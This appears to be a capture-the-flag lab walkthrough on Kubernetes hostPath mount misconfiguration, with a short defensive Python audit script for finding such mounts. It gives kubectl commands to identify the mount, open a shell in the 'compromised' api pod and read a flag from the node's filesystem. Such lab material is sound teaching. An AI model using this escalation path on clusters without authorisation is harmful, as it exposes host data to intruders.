
Airborneio 24 Challenge

The Airborneio 24 challenge requires you to find a flag located on the Kubernetes node's file system. Without direct access to the file system, and with only a view-only Kubernetes role, you will need to find a misconfiguration in an existing resource to gain access to the flag.

Host Path Mount Misconfiguration

Pods often need to store data on the file system as processes execute. Kubernetes supports many different volume types. The Kubernetes hostPath volume mount provides persistent storage for a pod using a directory on the host node's filesystem. Although it is often the simplest way to get persistent storage, a hostPath mount can be a powerful attack vector for privilege escalation.

Review the pod configurations in the hth namespace. Which pod is using a hostPath mount configuration? What directory on the host node's filesystem is being mounted into the pod?

Hint
  • List the pods running in the hth namespace. Make a note of the api pod's name, as you will need this in the next step.

    kubectl get pods -n hth
    

    Expected Output

    NAME            READY   STATUS    RESTARTS   AGE
    api-randomid    1/1     Running   0          2d21h
    ui-randomid     1/1     Running   0          2d21h
    
  • Describe the configuration for each pod using the kubectl describe pod command. Search the output for the pod that has a Volume with a Type set to HostPath. The volume's Path is pointing to a directory on the node's file system that will be accessible from inside a pod running in the cluster.

    kubectl describe pod -n hth ENTER_API_POD_NAME 
    

    Expected Output

    Volumes:
      hth:
        Type:          HostPath (bare host directory volume)
        Path:          ?????
        HostPathType:  DirectoryOrCreate
    
  • The same pod will have a Mount referencing the hth volume. The mount specifies the directory inside the container where the volume is accessible.

    Expected Output

    Mounts:
      ????? from hth (ro)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-rgfww (ro)
    
Answer
  • With this knowledge, you have discovered a host path mount attack path to get from a compromised api pod to the node's filesystem.

    Pod: api-randomid
    Pod Mount Location: /mnt/hth/
    Host Path Location: /opt/data/hth
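
The manual review above can be run across every pod at once. The following is an added example, not part of the original challenge material: it joins each hostPath volume to the container mounts that reference it, using a constructed pod list shaped like `kubectl get pods -o json` output. The function name `host_path_mounts` and the container names are assumptions made for illustration.

```python
import json
import sys

# Constructed sample shaped like `kubectl get pods -n hth -o json`; pod names and
# paths mirror the challenge, container names ("api", "ui") are assumed.
SAMPLE = json.loads("""
{"items": [
  {"metadata": {"namespace": "hth", "name": "api-randomid"},
   "spec": {
     "volumes": [
       {"name": "hth", "hostPath": {"path": "/opt/data/hth", "type": "DirectoryOrCreate"}},
       {"name": "kube-api-access-rgfww", "projected": {"sources": []}}],
     "containers": [
       {"name": "api", "volumeMounts": [
         {"name": "hth", "mountPath": "/mnt/hth", "readOnly": true},
         {"name": "kube-api-access-rgfww",
          "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount", "readOnly": true}]}]}},
  {"metadata": {"namespace": "hth", "name": "ui-randomid"}, "spec": {"containers": [{"name": "ui"}]}}
]}
""")


def host_path_mounts(pod_list):
    """Return one finding per (container, hostPath volume) pair in a pod list."""
    findings = []
    for pod in pod_list.get("items", []):
        spec = pod.get("spec", {})
        # Volume name -> host directory, for hostPath volumes only.
        host_dirs = {v["name"]: v["hostPath"]["path"]
                     for v in spec.get("volumes", []) if "hostPath" in v}
        containers = spec.get("initContainers", []) + spec.get("containers", [])
        for c in containers:
            for m in c.get("volumeMounts", []):
                if m["name"] in host_dirs:
                    findings.append({
                        "pod": f'{pod["metadata"]["namespace"]}/{pod["metadata"]["name"]}',
                        "container": c["name"],
                        "mount_path": m["mountPath"],
                        "host_path": host_dirs[m["name"]],
                        "read_only": m.get("readOnly", False),
                    })
    return findings


if __name__ == "__main__":
    # Audit a live cluster with: kubectl get pods -A -o json | python3 this_file.py -
    data = json.load(sys.stdin) if sys.argv[1:] == ["-"] else SAMPLE
    for f in host_path_mounts(data):
        print(json.dumps(f))
```

A finding with `read_only` set to true, as in this challenge, still exposes every file under the host directory to anyone with a shell in the container.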
    

Host Path Mount Privilege Escalation

Given a scenario where the pod is compromised, an attacker can use the hostPath volume mount to gain unauthorized access to data on the Kubernetes node. Use the kubectl exec command to obtain a shell on the compromised pod and exfiltrate the airborneio-24 flag from the Kubernetes node's filesystem.

Hint
  • Use the kubectl exec command to obtain a shell on the compromised pod.

    kubectl exec --stdin --tty -n hth ENTER_API_POD_NAME -- /bin/bash
    

    Expected Output

    root@api-randomid:/#
    
  • Once inside the pod, list the contents of the mount location.

    ls -l ?????
    

    Expected Output

    total 0
    drwxr-xr-x. 2 root root 68 Nov  8 23:03 api
    drwxr-xr-x. 2 root root 27 Nov  8 23:03 secrets
    
  • List the contents of the directory to find the airborneio-24 flag.

    ls -l ?????/secrets/
    

    Expected Output

    -rw-r--r--. 1 root root 42 Nov  8 23:03 airborneio-24
    
  • Use the cat command to read the contents of the airborneio-24 file and retrieve the flag.

  • Run the following command to exit the shell and return to your local machine.

    exit
    
Answer
  • The airborneio-24 flag is located in the /mnt/hth/secrets directory on the container's filesystem.

    cat /mnt/hth/secrets/airborneio-24
    

    Expected Output

    hth{?????}
    

Next Challenge

Congratulations! You have identified a host path mount misconfiguration and exfiltrated the Airborneio 24 flag from the Kubernetes node's file system.

Continue to the Shadowhawk Challenge to learn how Kubernetes pods can inherit permissions from the underlying Kubernetes node.